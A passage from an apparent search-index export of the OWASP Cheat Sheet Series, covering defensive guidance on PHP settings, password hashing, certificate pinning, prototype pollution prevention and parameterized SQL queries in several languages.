session.referer_check\u00a0\u00a0\u00a0=\u00a0/application/path\nmemory_limit\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a050M\npost_max_size\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a020M\nmax_execution_time\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a060\nreport_memleaks\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\ntrack_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nhtml_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#suhosin","title":"Suhosin","text":"

Suhosin is a patch to PHP which provides a number of hardening and security features that are not available in the default PHP build. However, Suhosin only works with PHP 5, which is unsupported and should not be used.

For PHP 7, there is Suhosin-ng, but it's in a prerelease stage, and as such should not be used in production.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#snuffleupagus","title":"Snuffleupagus","text":"

Snuffleupagus is the spiritual descendent of Suhosin for PHP 7 and onwards, with modern features. It's considered stable, and is usable in production.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html","title":"Password Storage Cheat Sheet","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

It is essential to store passwords in a way that prevents them from being obtained by an attacker even if the application or database is compromised. The majority of modern languages and frameworks provide built-in functionality to help store passwords safely.

After an attacker has acquired stored password hashes, they are always able to brute force hashes offline. As a defender, it is only possible to slow down offline attacks by selecting hash algorithms that are as resource intensive as possible.

This cheat sheet provides guidance on the various areas that need to be considered related to storing passwords. In short:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#background","title":"Background","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#hashing-vs-encryption","title":"Hashing vs Encryption","text":"

Hashing and encryption both provide ways to keep sensitive data safe. However, in almost all circumstances, passwords should be hashed, NOT encrypted.

Hashing is a one-way function (i.e., it is impossible to \"decrypt\" a hash and obtain the original plaintext value). Hashing is appropriate for password validation. Even if an attacker obtains the hashed password, they cannot enter it into an application's password field and log in as the victim.

Encryption is a two-way function, meaning that the original plaintext can be retrieved. Encryption is appropriate for storing data such as a user's address since this data is displayed in plaintext on the user's profile. Hashing their address would result in a garbled mess.

In the context of password storage, encryption should only be used in edge cases where it is necessary to obtain the original plaintext password. This might be necessary if the application needs to use the password to authenticate with another system that does not support a modern way to programmatically grant access, such as OpenID Connect (OIDC). Where possible, an alternative architecture should be used to avoid the need to store passwords in an encrypted form.

For further guidance on encryption, see the Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#how-attackers-crack-password-hashes","title":"How Attackers Crack Password Hashes","text":"

Although it is not possible to \"decrypt\" password hashes to obtain the original passwords, it is possible to \"crack\" the hashes in some circumstances.

The basic steps are:

This process is repeated for a large number of potential candidate passwords. Different methods can be used to select candidate passwords, including:

While the number of permutations can be enormous, with high speed hardware (such as GPUs) and cloud services with many servers for rent, the cost to an attacker is relatively small to do successful password cracking especially when best practices for hashing are not followed.

Strong passwords stored with modern hashing algorithms and using hashing best practices should be effectively impossible for an attacker to crack. It is your responsibility as an application owner to select a modern hashing algorithm.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-storage-concepts","title":"Password Storage Concepts","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#salting","title":"Salting","text":"

A salt is a unique, randomly generated string that is added to each password as part of the hashing process. As the salt is unique for every user, an attacker has to crack hashes one at a time using the respective salt rather than calculating a hash once and comparing it against every stored hash. This makes cracking large numbers of hashes significantly harder, as the time required grows in direct proportion to the number of hashes.

Salting also protects against an attacker pre-computing hashes using rainbow tables or database-based lookups. Finally, salting means that it is impossible to determine whether two users have the same password without cracking the hashes, as the different salts will result in different hashes even if the passwords are the same.

Modern hashing algorithms such as Argon2id, bcrypt, and PBKDF2 automatically salt the passwords, so no additional steps are required when using them.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#peppering","title":"Peppering","text":"

A pepper can be used in addition to salting to provide an additional layer of protection. The purpose of the pepper is to prevent an attacker from being able to crack any of the hashes if they only have access to the database, for example, if they have exploited a SQL injection vulnerability or obtained a backup of the database.

One of several peppering strategies is to hash the passwords as usual (using a password hashing algorithm) and then HMAC or encrypt the hashes with a symmetrical encryption key before storing the password hash in the database, with the key acting as the pepper. Peppering strategies do not affect the password hashing function in any way.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#work-factors","title":"Work Factors","text":"

The work factor is essentially the number of iterations of the hashing algorithm that are performed for each password (usually, it's actually 2^work iterations). The purpose of the work factor is to make calculating the hash more computationally expensive, which in turn reduces the speed and/or increases the cost for which an attacker can attempt to crack the password hash. The work factor is typically stored in the hash output.

When choosing a work factor, a balance needs to be struck between security and performance. Higher work factors will make the hashes more difficult for an attacker to crack but will also make the process of verifying a login attempt slower. If the work factor is too high, this may degrade the performance of the application and could also be used by an attacker to carry out a denial of service attack by making a large number of login attempts to exhaust the server's CPU.

There is no golden rule for the ideal work factor - it will depend on the performance of the server and the number of users on the application. Determining the optimal work factor will require experimentation on the specific server(s) used by the application. As a general rule, calculating a hash should take less than one second.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-the-work-factor","title":"Upgrading the Work Factor","text":"

One key advantage of having a work factor is that it can be increased over time as hardware becomes more powerful and cheaper.

The most common approach to upgrading the work factor is to wait until the user next authenticates and then to re-hash their password with the new work factor. This means that different hashes will have different work factors and may result in hashes never being upgraded if the user doesn't log back into the application. Depending on the application, it may be appropriate to remove the older password hashes and require users to reset their passwords next time they need to login in order to avoid storing older and less secure hashes.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-hashing-algorithms","title":"Password Hashing Algorithms","text":"

There are a number of modern hashing algorithms that have been specifically designed for securely storing passwords. This means that they should be slow (unlike algorithms such as MD5 and SHA-1, which were designed to be fast), and how slow they are can be configured by changing the work factor.

Websites should not hide which password hashing algorithm they use. If you utilize a modern password hashing algorithm with proper configuration parameters, it should be safe to state in public which password hashing algorithms are in use and be listed here.

The main three algorithms that should be considered are listed below:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#argon2id","title":"Argon2id","text":"

Argon2 is the winner of the 2015 Password Hashing Competition. There are three different versions of the algorithm, and the Argon2id variant should be used, as it provides a balanced approach to resisting both side-channel and GPU-based attacks.

Rather than a simple work factor like other algorithms, Argon2id has three different parameters that can be configured. Argon2id should use one of the following configuration settings as a base minimum which includes the minimum memory size (m), the minimum number of iterations (t) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#scrypt","title":"scrypt","text":"

scrypt is a password-based key derivation function created by Colin Percival. While Argon2id should be the best choice for password hashing, scrypt should be used when the former is not available.

Like Argon2id, scrypt has three different parameters that can be configured. scrypt should use one of the following configuration settings as a base minimum which includes the minimum CPU/memory cost parameter (N), the blocksize (r) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#bcrypt","title":"bcrypt","text":"

The bcrypt password hashing function should be the best choice for password storage in legacy systems or if PBKDF2 is required to achieve FIPS-140 compliance.

The work factor should be as large as verification server performance will allow, with a minimum of 10.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#input-limits","title":"Input Limits","text":"

bcrypt has a maximum length input length of 72 bytes for most implementations. To protect against this issue, a maximum password length of 72 bytes (or less if the implementation in use has smaller limits) should be enforced when using bcrypt.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pre-hashing-passwords","title":"Pre-Hashing Passwords","text":"

An alternative approach is to pre-hash the user-supplied password with a fast algorithm such as SHA-256, and then to hash the resulting hash with bcrypt (i.e., bcrypt(base64(hmac-sha256(data:$password, key:$pepper)), $salt, $cost)). This is a dangerous (but common) practice that should be avoided due to password shucking and other issues when combining bcrypt with other hash functions.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2","title":"PBKDF2","text":"

PBKDF2 is recommended by NIST and has FIPS-140 validated implementations. So, it should be the preferred algorithm when these are required.

PBKDF2 requires that you select an internal hashing algorithm such as an HMAC or a variety of other hashing algorithms. HMAC-SHA-256 is widely supported and is recommended by NIST.

The work factor for PBKDF2 is implemented through an iteration count, which should set differently based on the internal hashing algorithm used.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#parallel-pbkdf2","title":"Parallel PBKDF2","text":"

These configuration settings are equivalent in the defense they provide. (Number as of december 2022, based on testing of RTX 4000 GPUs)

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2-pre-hashing","title":"PBKDF2 Pre-hashing","text":"

When PBKDF2 is used with an HMAC, and the password is longer than the hash function's block size (64 bytes for SHA-256), the password will be automatically pre-hashed. For example, the password \"This is a password longer than 512 bits which is the block size of SHA-256\" is converted to the hash value (in hex): fa91498c139805af73f7ba275cca071e78d78675027000c99a9925e2ec92eedd.

A good implementation of PBKDF2 will perform pre-hashing before the expensive iterated hashing phase, but some implementations perform the conversion on each iteration. This can make hashing long passwords significantly more expensive than hashing short passwords. If a user can supply very long passwords, there is a potential denial of service vulnerability, such as the one published in Django in 2013. Manual pre-hashing can reduce this risk but requires adding a salt to the pre-hash step.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-legacy-hashes","title":"Upgrading Legacy Hashes","text":"

For older applications built using less secure hashing algorithms such as MD5 or SHA-1, these hashes should be upgraded to modern password hashing algorithms as described above. When the user next enters their password (usually by authenticating on the application), it should be re-hashed using the new algorithm. It would also be good practice to expire the users' current password and require them to enter a new one so that any older (less secure) hashes of their password are no longer useful to an attacker.

However, this approach means that old (less secure) password hashes will be stored in the database until the user logs in. Two main approaches can be taken to avoid this dilemma.

One method is to expire and delete the password hashes of users who have been inactive for an extended period and require them to reset their passwords to login again. Although secure, this approach is not particularly user-friendly. Expiring the passwords of many users may cause issues for support staff or may be interpreted by users as an indication of a breach.

An alternative approach is to use the existing password hashes as inputs for a more secure algorithm. For example, if the application originally stored passwords as md5($password), this could be easily upgraded to bcrypt(md5($password)). Layering the hashes avoids the need to know the original password; however, it can make the hashes easier to crack. These hashes should be replaced with direct hashes of the users' passwords next time the user logs in.

Assume that whatever password hashing method is selected will have to be upgraded in the future. Ensure that upgrading your hashing algorithm is as easy as possible. For a transition period, allow for a mix of old and new hashing algorithms. Using a mix of hashing algorithms is easier if the password hashing algorithm and work factor are stored with the password using a standard format, for example, the modular PHC string format.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#international-characters","title":"International Characters","text":"

Ensure your hashing library is able to accept a wide range of characters and is compatible with all Unicode codepoints. Users should be able to use the full range of characters available on modern devices, in particular mobile keyboards. They should be able to select passwords from various languages and include pictograms. Prior to hashing the entropy of the user's entry should not be reduced. Password hashing libraries need to be able to use input that may contain a NULL byte.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html","title":"Pinning Cheat Sheet","text":""},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Pinning Cheat Sheet is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter's presentation Securing Wireless Channels in the Mobile Space. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#whats-the-problem","title":"What's the problem","text":"

Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-is-pinning","title":"What Is Pinning","text":"

Pinning is the process of associating a host with their expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a pinset (taking from Jon Larimer and Kenny Root Google I/O talk). In this case, the advertised identity must match one of the elements in the pinset.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-add-a-pin","title":"When to Add a Pin","text":"

A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-perform-pinning","title":"When Do You Perform Pinning","text":"

You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-not-pin","title":"When Do You Not Pin?","text":"

Pinning requires control of upcoming certificate attributes. If the certificate key pair cannot be predicted in advance before it is put into service, then pinning will lead to an outage when the endpoint presents a new certificate. For instance, if a certificate provider generates random key pairs whenever a certificate is rotated, and you cannot control when this certificate is put into use, then you will not be able to update your clients until they have already experienced an outage.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-apply-exceptions","title":"When to Apply Exceptions","text":"

If you are working for an organization which practices \"egress filtering\" as part of a Data Loss Prevention (DLP) strategy, you will likely encounter Interception Proxies. I like to refer to these things as \"good\" bad actors (as opposed to \"bad\" bad actors) since both break end-to-end security and we can't tell them apart. In this case, do not offer to allow-list the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being instructed to do so by the folks in Risk Acceptance.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#how-do-you-pin","title":"How Do You Pin","text":"

The idea is to re-use the exiting protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.

To harden the channel, the program would take advantage of the OnConnect callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key. See some examples below.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-should-be-pinned","title":"What Should Be Pinned","text":"

In order to decide what should be pinned you can follow the following steps.

  1. Decide if you want to pin the root CA, intermediate CA or leaf certificate:

    For example, the application pins the remote endpoint leaf certificate but includes a backup pin for the intermediate CA. This increases the risk by trusting more certificate authorities but decreases the chances of bricking your app. If there's any issue with the leaf certificate, the app can always fall back to the intermediate CA until you release an app update.

  2. Choose if you want to pin the whole certificate or just its public key.

  3. If you chose the public key, you have two additional choices:

  4. Pin the subjectPublicKeyInfo.

  5. Pin one of the concrete types such as RSAPublicKey or DSAPublicKey.

subjectPublicKeyInfo:

The three choices are explained below in more detail. I would encourage you to pin the subjectPublicKeyInfo because it has the public parameters (such as {e,n} for an RSA public key) and contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and the figure to the right shows the additional information available.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#certificate","title":"Certificate","text":"

The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use openssl s_client to retrieve the certificate etc. At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#public-key","title":"Public Key","text":"

Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#hash","title":"Hash","text":"

While the three choices above used DER encoding, its also acceptable to use a hash of the information. In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like dumpasn1 and other ASN.1 decoders.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#examples-of-pinning","title":"Examples of Pinning","text":"

This section discusses certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. Code has been omitted for brevity, but the key points for the platform are highlighted.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#android","title":"Android","text":"

Since Android N, the preferred way for implementing pinning is by leveraging Android's Network Security Configuration feature, which lets apps customize their network security settings in a safe, declarative configuration file without modifying app code.

To enable pinning, the <pin-set> configuration setting can be used.

If devices running a version of Android that is earlier than N need to be supported, a backport of the Network Security Configuration pinning functionality is available via the TrustKit Android library.

Alternatively you can use methods such as the pinning from OkHTTP in order to set specific pins programmatically, as explained in the OWASP Mobile Security Testing Guide (MSTG) and the OKHttp documentation.

The Android documentation provides an example of how SSL validation can be customized within the app's code (in order to implement pinning) in the Unknown CA implementation document. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow instructions from the introduction into testing network communication and the Android specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#ios","title":"iOS","text":"

Apple suggests pinning a CA public key by specifying it in Info.plist file under App Transport Security Settings. More details in the article \"Identity Pinning: How to configure server certificates for your app\".

TrustKit, an open-source SSL pinning library for iOS and macOS is available. It provides an easy-to-use API for implementing pinning, and has been deployed in many apps.

Otherwise, more details regarding how SSL validation can be customized on iOS (in order to implement pinning) are available in the HTTPS Server Trust Evaluation technical note. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow instructions from the introduction into testing network communication and the iOS specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#net","title":".Net","text":"

.Net pinning can be achieved by using ServicePointManager. An example can be found at the OWASP MSTG.

Download the .Net sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#openssl","title":"OpenSSL","text":"

Pinning can occur at one of two places with OpenSSL. First is the user supplied verify_callback. Second is after the connection is established via SSL_get_peer_certificate. Either method will allow you to access the peer's certificate.

Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in X509_V_OK with a NULL certificate. To check the result of the customary verification:

  1. You must call SSL_get_verify_result and verify the return code is X509_V_OK;
  2. You must call SSL_get_peer_certificate and verify the certificate is non-NULL.

Download: OpenSSL sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#electron","title":"Electron","text":"

electron-ssl-pinning, an open-source SSL pinning library for Electron based applications. It provides an easy-to-use API for implementing pinning and also provides tool for fetching configuration based on needed hosts.

Otherwise, you can validate certificates by yourself using ses.setCertificateVerifyProc(proc).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html","title":"Prototype Pollution Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#explanation","title":"Explanation","text":"

Prototype Pollution is a critical vulnerability that can allow attackers to manipulate an application's JavaScript objects and properties, leading to serious security issues such as unauthorized access to data, privilege escalation, and even remote code execution.

For examples of why this is dangerous, see the links in the Other resources section below.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#suggested-protection-mechanisms","title":"Suggested protection mechanisms","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map","title":"Use \"new Set()\" or \"new Map()\"","text":"

Developers should use new Set() or new Map() instead of using object literals:

let allowedTags = new Set();\nallowedTags.add('b');\nif(allowedTags.has('b')){\n//...\n}\n\nlet options = new Map();\noptions.set('spaces', 1);\nlet spaces = options.get('spaces')\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required","title":"If objects or object literals are required","text":"

If objects have to be used then they should be created using the Object.create(null) API to ensure they don't inherit from the Object prototype:

let obj = Object.create(null);\n

If object literals are required then as a last resort you could use the __proto__ property:

let obj = {__proto__:null};\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms","title":"Use object \"freeze\" and \"seal\" mechanisms","text":"

You can also use the Object.freeze() and Object.seal() APIs to prevent built-in prototypes from being modified however this can break the application if the libraries they use modify the built-in prototypes.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag","title":"Node.js configuration flag","text":"

Node.js also offers the ability to remove the __proto__ property completely using the --disable-proto=delete flag. Note this is a defense in depth measure.

Prototype pollution is still possible using constructor.prototype properties but removing __proto__ helps reduce attack surface and prevent certain attacks.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#other-resources","title":"Other resources","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#credits","title":"Credits","text":"

Credit to Gareth Hayes for providing the original protection guidance in this comment.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html","title":"Query Parameterization Cheat Sheet","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

SQL Injection is one of the most dangerous web vulnerabilities. So much so that it was the #1 item in both the OWASP Top 10 2013 version, and 2017 version. As of 2021, it sits at #3 on the OWASP Top 10.

It represents a serious threat because SQL Injection allows evil attacker code to change the structure of a web application's SQL statement in a way that can steal data, modify data, or potentially facilitate command injection to the underlying OS.

This cheat sheet is a derivative work of the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#parameterized-query-examples","title":"Parameterized Query Examples","text":"

SQL Injection is best prevented through the use of parameterized queries. The following chart demonstrates, with real-world code samples, how to build parameterized queries in most of the common web languages. The purpose of these code samples is to demonstrate to the web developer how to avoid SQL Injection when building database queries within a web application.

Please note, many client side frameworks and libraries offer client side query parameterization. These libraries often just build queries with string concatenation before sending raw queries to a server. Please ensure that query parameterization is done server-side!

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#prepared-statement-examples","title":"Prepared Statement Examples","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-built-in-feature","title":"Using Java built-in feature","text":"
String custname = request.getParameter(\"customerName\");\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ? \";  PreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString( 1, custname);\nResultSet results = pstmt.executeQuery( );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-with-hibernate","title":"Using Java with Hibernate","text":"
// HQL\n@Entity // declare as entity;\n@NamedQuery(\nname=\"findByDescription\",\nquery=\"FROM Inventory i WHERE i.productDescription = :productDescription\"\n)\npublic class Inventory implements Serializable {\n@Id\nprivate long id;\nprivate String productDescription;\n}\n\n// Use case\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nList<Inventory> list =\nsession.getNamedQuery(\"findByDescription\")\n.setParameter(\"productDescription\", userSuppliedParameter).list();\n\n// Criteria API\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nInventory inv = (Inventory) session.createCriteria(Inventory.class).add\n(Restrictions.eq(\"productDescription\", userSuppliedParameter)).uniqueResult();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-net-built-in-feature","title":"Using .NET built-in feature","text":"
String query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\ntry {\nOleDbCommand command = new OleDbCommand(query, connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName Name.Text));\nOleDbDataReader reader = command.ExecuteReader();\n// \u2026\n} catch (OleDbException se) {\n// error handling\n}\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-asp-net-built-in-feature","title":"Using ASP .NET built-in feature","text":"
string sql = \"SELECT * FROM Customers WHERE CustomerId = @CustomerId\";\nSqlCommand command = new SqlCommand(sql);\ncommand.Parameters.Add(new SqlParameter(\"@CustomerId\", System.Data.SqlDbType.Int));\ncommand.Parameters[\"@CustomerId\"].Value = 1;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-with-activerecord","title":"Using Ruby with ActiveRecord","text":"
## Create\nProject.create!(:name => 'owasp')\n## Read\nProject.all(:conditions => \"name = ?\", name)\nProject.all(:conditions => { :name => name })\nProject.where(\"name = :name\", :name => name)\n## Update\nproject.update_attributes(:name => 'owasp')\n## Delete\nProject.delete(:name => 'name')\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-built-in-feature","title":"Using Ruby built-in feature","text":"
insert_new_user = db.prepare \"INSERT INTO users (name, age, gender) VALUES (?, ? ,?)\"\ninsert_new_user.execute 'aizatto', '20', 'male'\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-php-with-php-data-objects","title":"Using PHP with PHP Data Objects","text":"
$stmt = $dbh->prepare(\"INSERT INTO REGISTRY (name, value) VALUES (:name, :value)\");\n$stmt->bindParam(':name', $name);\n$stmt->bindParam(':value', $value);\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-cold-fusion-built-in-feature","title":"Using Cold Fusion built-in feature","text":"
<cfquery name = \"getFirst\" dataSource = \"cfsnippets\">\n    SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID =\n    <cfqueryparam value = #intCourseID# CFSQLType = \"CF_SQL_INTEGER\">\n</cfquery>\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-perl-with-database-independent-interface","title":"Using PERL with Database Independent Interface","text":"
my $sql = \"INSERT INTO foo (bar, baz) VALUES ( ?, ? )\";\nmy $sth = $dbh->prepare( $sql );\n$sth->execute( $bar, $baz );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-rust-with-sqlx","title":"Using Rust with SQLx","text":"
// Input from CLI args but could be anything\nlet username = std::env::args().last().unwrap();\n\n// Using build-in macros (compile time checks)\nlet users = sqlx::query_as!(\nUser,\n\"SELECT * FROM users WHERE name = ?\",\nusername\n)\n.fetch_all(&pool)\n.await .unwrap();\n\n// Using built-in functions\nlet users: Vec<User> = sqlx::query_as::<_, User>(\n\"SELECT * FROM users WHERE name = ?\"\n)\n.bind(&username)\n.fetch_all(&pool)\n.await\n.unwrap();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-examples","title":"Stored Procedure Examples","text":"

The SQL you write in your web application isn't the only place that SQL injection vulnerabilities can be introduced. If you are using Stored Procedures, and you are dynamically constructing SQL inside them, you can also introduce SQL injection vulnerabilities.

Dynamic SQL can be parameterized using bind variables, to ensure the dynamically constructed SQL is secure.

Here are some examples of using bind variables in stored procedures in different databases.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#oracle-using-plsql","title":"Oracle using PL/SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(UserID varchar, Dept varchar) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = UserID AND department = Dept;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-execute","title":"Stored Procedure Using Bind Variables in SQL Run with EXECUTE","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE AnotherSafeGetBalanceQuery(UserID varchar, Dept varchar)\nAS stmt VARCHAR(400); result NUMBER;\nBEGIN\nstmt := 'SELECT balance FROM accounts_table WHERE user_ID = :1\n            AND department = :2';\nEXECUTE IMMEDIATE stmt INTO result USING UserID, Dept;\nRETURN result;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#sql-server-using-transact-sql","title":"SQL Server using Transact-SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure_1","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = @UserID AND department = @Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-exec","title":"Stored Procedure Using Bind Variables in SQL Run with EXEC","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nDECLARE @sql VARCHAR(200)\nSELECT @sql = 'SELECT balance FROM accounts_table WHERE '\n+ 'user_ID = @UID AND department = @DPT'\nEXEC sp_executesql @sql,\n'@UID VARCHAR(20), @DPT VARCHAR(10)',\n@UID=@UserID, @DPT=@Dept\nEND\n
